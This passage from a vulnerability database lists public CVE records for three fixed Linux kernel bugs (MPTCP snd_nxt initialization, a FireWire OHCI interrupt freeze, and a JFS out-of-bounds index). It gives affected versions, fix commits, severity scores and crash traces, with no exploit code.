"url": "https://git.kernel.org/stable/c/aa0c07c1f20e05b30019bff083ec43665536f06f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/592f69b41766d366dbb8ff4ef5a67c4396527bbe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb7a0d334894206ae35f023a82cad5a290fd7386"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "99951b62bf20cec9247f633a3bea898338b9e5b4",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
},
{
"lessThan": "dc941fec0719d0471a5902424d6b2a17df233193",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
},
{
"lessThan": "39ca83ed73db9edcc6d70c0dc7a73085a4725012",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
},
{
"lessThan": "aa0c07c1f20e05b30019bff083ec43665536f06f",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
},
{
"lessThan": "592f69b41766d366dbb8ff4ef5a67c4396527bbe",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
},
{
"lessThan": "fb7a0d334894206ae35f023a82cad5a290fd7386",
"status": "affected",
"version": "8fd738049ac3d67a937d36577763b47180aae1ad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/mptcp/protocol.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.218",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.218",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: ensure snd_nxt is properly initialized on connect\n\nChristoph reported a splat hinting at a corrupted snd_una:\n\n WARNING: CPU: 1 PID: 38 at net/mptcp/protocol.c:1005 __mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005\n Modules linked in:\n CPU: 1 PID: 38 Comm: kworker/1:1 Not tainted 6.9.0-rc1-gbbeac67456c9 #59\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.11.0-2.el7 04/01/2014\n Workqueue: events mptcp_worker\n RIP: 0010:__mptcp_clean_una+0x4b3/0x620 net/mptcp/protocol.c:1005\n Code: be 06 01 00 00 bf 06 01 00 00 e8 a8 12 e7 fe e9 00 fe ff ff e8\n \t8e 1a e7 fe 0f b7 ab 3e 02 00 00 e9 d3 fd ff ff e8 7d 1a e7 fe\n \t\u003c0f\u003e 0b 4c 8b bb e0 05 00 00 e9 74 fc ff ff e8 6a 1a e7 fe 0f 0b e9\n RSP: 0018:ffffc9000013fd48 EFLAGS: 00010293\n RAX: 0000000000000000 RBX: ffff8881029bd280 RCX: ffffffff82382fe4\n RDX: ffff8881003cbd00 RSI: ffffffff823833c3 RDI: 0000000000000001\n RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000\n R10: 0000000000000000 R11: fefefefefefefeff R12: ffff888138ba8000\n R13: 0000000000000106 R14: ffff8881029bd908 R15: ffff888126560000\n FS: 0000000000000000(0000) GS:ffff88813bd00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f604a5dae38 CR3: 0000000101dac002 CR4: 0000000000170ef0\n Call Trace:\n \u003cTASK\u003e\n __mptcp_clean_una_wakeup net/mptcp/protocol.c:1055 [inline]\n mptcp_clean_una_wakeup net/mptcp/protocol.c:1062 [inline]\n __mptcp_retrans+0x7f/0x7e0 net/mptcp/protocol.c:2615\n mptcp_worker+0x434/0x740 net/mptcp/protocol.c:2767\n process_one_work+0x1e0/0x560 kernel/workqueue.c:3254\n process_scheduled_works kernel/workqueue.c:3335 [inline]\n worker_thread+0x3c7/0x640 kernel/workqueue.c:3416\n kthread+0x121/0x170 kernel/kthread.c:388\n ret_from_fork+0x44/0x50 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243\n \u003c/TASK\u003e\n\nWhen fallback to TCP happens early on a client socket, snd_nxt\nis not yet initialized and any incoming ack will copy such value\ninto snd_una. If the mptcp worker (dumbly) tries mptcp-level\nre-injection after such ack, that would unconditionally trigger a send\nbuffer cleanup using \u0027bad\u0027 snd_una values.\n\nWe could easily disable re-injection for fallback sockets, but such\ndumb behavior already helped catching a few subtle issues and a very\nlow to zero impact in practice.\n\nInstead address the issue always initializing snd_nxt (and write_seq,\nfor consistency) at connect time."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:11:28.710Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/99951b62bf20cec9247f633a3bea898338b9e5b4"
},
{
"url": "https://git.kernel.org/stable/c/dc941fec0719d0471a5902424d6b2a17df233193"
},
{
"url": "https://git.kernel.org/stable/c/39ca83ed73db9edcc6d70c0dc7a73085a4725012"
},
{
"url": "https://git.kernel.org/stable/c/aa0c07c1f20e05b30019bff083ec43665536f06f"
},
{
"url": "https://git.kernel.org/stable/c/592f69b41766d366dbb8ff4ef5a67c4396527bbe"
},
{
"url": "https://git.kernel.org/stable/c/fb7a0d334894206ae35f023a82cad5a290fd7386"
}
],
"title": "mptcp: ensure snd_nxt is properly initialized on connect",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36889",
"datePublished": "2024-05-30T15:28:56.794Z",
"dateReserved": "2024-05-30T15:25:07.065Z",
"dateUpdated": "2025-05-04T09:11:28.710Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36950 (GCVE-0-2024-36950)
Vulnerability from cvelistv5
Published
2024-05-30 15:35
Modified
2025-05-20 14:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
firewire: ohci: mask bus reset interrupts between ISR and bottom half
In the FireWire OHCI interrupt handler, if a bus reset interrupt has
occurred, mask bus reset interrupts until bus_reset_work has serviced and
cleared the interrupt.
Normally, we always leave bus reset interrupts masked. We infer the bus
reset from the self-ID interrupt that happens shortly thereafter. A
scenario where we unmask bus reset interrupts was introduced in 2008 in
a007bb857e0b26f5d8b73c2ff90782d9c0972620: If
OHCI_PARAM_DEBUG_BUSRESETS (8) is set in the debug parameter bitmask, we
will unmask bus reset interrupts so we can log them.
irq_handler logs the bus reset interrupt. However, we can't clear the bus
reset event flag in irq_handler, because we won't service the event until
later. irq_handler exits with the event flag still set. If the
corresponding interrupt is still unmasked, the first bus reset will
usually freeze the system due to irq_handler being called again each
time it exits. This freeze can be reproduced by loading firewire_ohci
with "modprobe firewire_ohci debug=-1" (to enable all debugging output).
Apparently there are also some cases where bus_reset_work will get called
soon enough to clear the event, and operation will continue normally.
This freeze was first reported a few months after a007bb85 was committed,
but until now it was never fixed. The debug level could safely be set
to -1 through sysfs after the module was loaded, but this would be
ineffectual in logging bus reset interrupts since they were only
unmasked during initialization.
irq_handler will now leave the event flag set but mask bus reset
interrupts, so irq_handler won't be called again and there will be no
freeze. If OHCI_PARAM_DEBUG_BUSRESETS is enabled, bus_reset_work will
unmask the interrupt after servicing the event, so future interrupts
will be caught as desired.
As a side effect to this change, OHCI_PARAM_DEBUG_BUSRESETS can now be
enabled through sysfs in addition to during initial module loading.
However, when enabled through sysfs, logging of bus reset interrupts will
be effective only starting with the second bus reset, after
bus_reset_work has executed.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-36950",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-04T15:34:28.122404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T14:13:44.582Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.561Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3948c69d60279fce5b2eeda92a07d66296c8130"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31279bbca40d2f40cb3bbb6d538ec9620a645dec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa273f312334246c909475c5868e6daab889cc8c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f9cc355c328fc4f41cbd9c4cd58b235184fa420"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fafe3661712b143d9c69a7322294bd53f559d5d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5982887de60c1b84f9c0ca07c835814d07fd1da0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8643332aac0576581cfdf01798ea3e4e0d624b61"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/752e3c53de0fa3b7d817a83050b6699b8e9c6ec9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firewire/ohci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b3948c69d60279fce5b2eeda92a07d66296c8130",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "31279bbca40d2f40cb3bbb6d538ec9620a645dec",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fa273f312334246c909475c5868e6daab889cc8c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4f9cc355c328fc4f41cbd9c4cd58b235184fa420",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6fafe3661712b143d9c69a7322294bd53f559d5d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5982887de60c1b84f9c0ca07c835814d07fd1da0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8643332aac0576581cfdf01798ea3e4e0d624b61",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "752e3c53de0fa3b7d817a83050b6699b8e9c6ec9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firewire/ohci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirewire: ohci: mask bus reset interrupts between ISR and bottom half\n\nIn the FireWire OHCI interrupt handler, if a bus reset interrupt has\noccurred, mask bus reset interrupts until bus_reset_work has serviced and\ncleared the interrupt.\n\nNormally, we always leave bus reset interrupts masked. We infer the bus\nreset from the self-ID interrupt that happens shortly thereafter. A\nscenario where we unmask bus reset interrupts was introduced in 2008 in\na007bb857e0b26f5d8b73c2ff90782d9c0972620: If\nOHCI_PARAM_DEBUG_BUSRESETS (8) is set in the debug parameter bitmask, we\nwill unmask bus reset interrupts so we can log them.\n\nirq_handler logs the bus reset interrupt. However, we can\u0027t clear the bus\nreset event flag in irq_handler, because we won\u0027t service the event until\nlater. irq_handler exits with the event flag still set. If the\ncorresponding interrupt is still unmasked, the first bus reset will\nusually freeze the system due to irq_handler being called again each\ntime it exits. This freeze can be reproduced by loading firewire_ohci\nwith \"modprobe firewire_ohci debug=-1\" (to enable all debugging output).\nApparently there are also some cases where bus_reset_work will get called\nsoon enough to clear the event, and operation will continue normally.\n\nThis freeze was first reported a few months after a007bb85 was committed,\nbut until now it was never fixed. The debug level could safely be set\nto -1 through sysfs after the module was loaded, but this would be\nineffectual in logging bus reset interrupts since they were only\nunmasked during initialization.\n\nirq_handler will now leave the event flag set but mask bus reset\ninterrupts, so irq_handler won\u0027t be called again and there will be no\nfreeze. If OHCI_PARAM_DEBUG_BUSRESETS is enabled, bus_reset_work will\nunmask the interrupt after servicing the event, so future interrupts\nwill be caught as desired.\n\nAs a side effect to this change, OHCI_PARAM_DEBUG_BUSRESETS can now be\nenabled through sysfs in addition to during initial module loading.\nHowever, when enabled through sysfs, logging of bus reset interrupts will\nbe effective only starting with the second bus reset, after\nbus_reset_work has executed."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:12:40.346Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b3948c69d60279fce5b2eeda92a07d66296c8130"
},
{
"url": "https://git.kernel.org/stable/c/31279bbca40d2f40cb3bbb6d538ec9620a645dec"
},
{
"url": "https://git.kernel.org/stable/c/fa273f312334246c909475c5868e6daab889cc8c"
},
{
"url": "https://git.kernel.org/stable/c/4f9cc355c328fc4f41cbd9c4cd58b235184fa420"
},
{
"url": "https://git.kernel.org/stable/c/6fafe3661712b143d9c69a7322294bd53f559d5d"
},
{
"url": "https://git.kernel.org/stable/c/5982887de60c1b84f9c0ca07c835814d07fd1da0"
},
{
"url": "https://git.kernel.org/stable/c/8643332aac0576581cfdf01798ea3e4e0d624b61"
},
{
"url": "https://git.kernel.org/stable/c/752e3c53de0fa3b7d817a83050b6699b8e9c6ec9"
}
],
"title": "firewire: ohci: mask bus reset interrupts between ISR and bottom half",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36950",
"datePublished": "2024-05-30T15:35:46.262Z",
"dateReserved": "2024-05-30T15:25:07.079Z",
"dateUpdated": "2025-05-20T14:13:44.582Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52604 (GCVE-0-2023-52604)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
FS:JFS:UBSAN:array-index-out-of-bounds in dbAdjTree
Syzkaller reported the following issue:
UBSAN: array-index-out-of-bounds in fs/jfs/jfs_dmap.c:2867:6
index 196694 is out of range for type 's8[1365]' (aka 'signed char[1365]')
CPU: 1 PID: 109 Comm: jfsCommit Not tainted 6.6.0-rc3-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/04/2023
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106
ubsan_epilogue lib/ubsan.c:217 [inline]
__ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348
dbAdjTree+0x474/0x4f0 fs/jfs/jfs_dmap.c:2867
dbJoin+0x210/0x2d0 fs/jfs/jfs_dmap.c:2834
dbFreeBits+0x4eb/0xda0 fs/jfs/jfs_dmap.c:2331
dbFreeDmap fs/jfs/jfs_dmap.c:2080 [inline]
dbFree+0x343/0x650 fs/jfs/jfs_dmap.c:402
txFreeMap+0x798/0xd50 fs/jfs/jfs_txnmgr.c:2534
txUpdateMap+0x342/0x9e0
txLazyCommit fs/jfs/jfs_txnmgr.c:2664 [inline]
jfs_lazycommit+0x47a/0xb70 fs/jfs/jfs_txnmgr.c:2732
kthread+0x2d3/0x370 kernel/kthread.c:388
ret_from_fork+0x48/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304
</TASK>
================================================================================
Kernel panic - not syncing: UBSAN: panic_on_warn set ...
CPU: 1 PID: 109 Comm: jfsCommit Not tainted 6.6.0-rc3-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/04/2023
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106
panic+0x30f/0x770 kernel/panic.c:340
check_panic_on_warn+0x82/0xa0 kernel/panic.c:236
ubsan_epilogue lib/ubsan.c:223 [inline]
__ubsan_handle_out_of_bounds+0x13c/0x150 lib/ubsan.c:348
dbAdjTree+0x474/0x4f0 fs/jfs/jfs_dmap.c:2867
dbJoin+0x210/0x2d0 fs/jfs/jfs_dmap.c:2834
dbFreeBits+0x4eb/0xda0 fs/jfs/jfs_dmap.c:2331
dbFreeDmap fs/jfs/jfs_dmap.c:2080 [inline]
dbFree+0x343/0x650 fs/jfs/jfs_dmap.c:402
txFreeMap+0x798/0xd50 fs/jfs/jfs_txnmgr.c:2534
txUpdateMap+0x342/0x9e0
txLazyCommit fs/jfs/jfs_txnmgr.c:2664 [inline]
jfs_lazycommit+0x47a/0xb70 fs/jfs/jfs_txnmgr.c:2732
kthread+0x2d3/0x370 kernel/kthread.c:388
ret_from_fork+0x48/0x80 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:304
</TASK>
Kernel Offset: disabled
Rebooting in 86400 seconds..
The issue is caused when the value of lp becomes greater than
CTLTREESIZE which is the max size of stree. Adding a simple check
solves this issue.
Dave:
As the function returns a void, good error handling
would require a more intrusive code reorganization, so I modified
Osama's patch at use WARN_ON_ONCE for lack of a cleaner option.
The patch is tested via syzbot.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52604",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T19:11:36.244140Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:17.089Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.171Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3e95c6850661c77e6dab079d9b5374a618ebb15"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98f9537fe61b8382b3cc5dd97347531698517c56"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de34de6e57bbbc868e4fcf9e98c76b3587cabb0b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fe8b702125aeee6ce83f20092a2341446704e7b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42f433785f108893de0dd5260bafb85d7d51db03"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a44065dd604972ec1fbcccbdc4a70d266a89cdd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/59342822276f753e49d27ef5eebffbba990572b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9862ec7ac1cbc6eb5ee4a045b5d5b8edbb2f7e68"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e3e95c6850661c77e6dab079d9b5374a618ebb15",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "98f9537fe61b8382b3cc5dd97347531698517c56",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "de34de6e57bbbc868e4fcf9e98c76b3587cabb0b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6fe8b702125aeee6ce83f20092a2341446704e7b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "42f433785f108893de0dd5260bafb85d7d51db03",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6a44065dd604972ec1fbcccbdc4a70d266a89cdd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "59342822276f753e49d27ef5eebffbba990572b9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9862ec7ac1cbc6eb5ee4a045b5d5b8edbb2f7e68",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
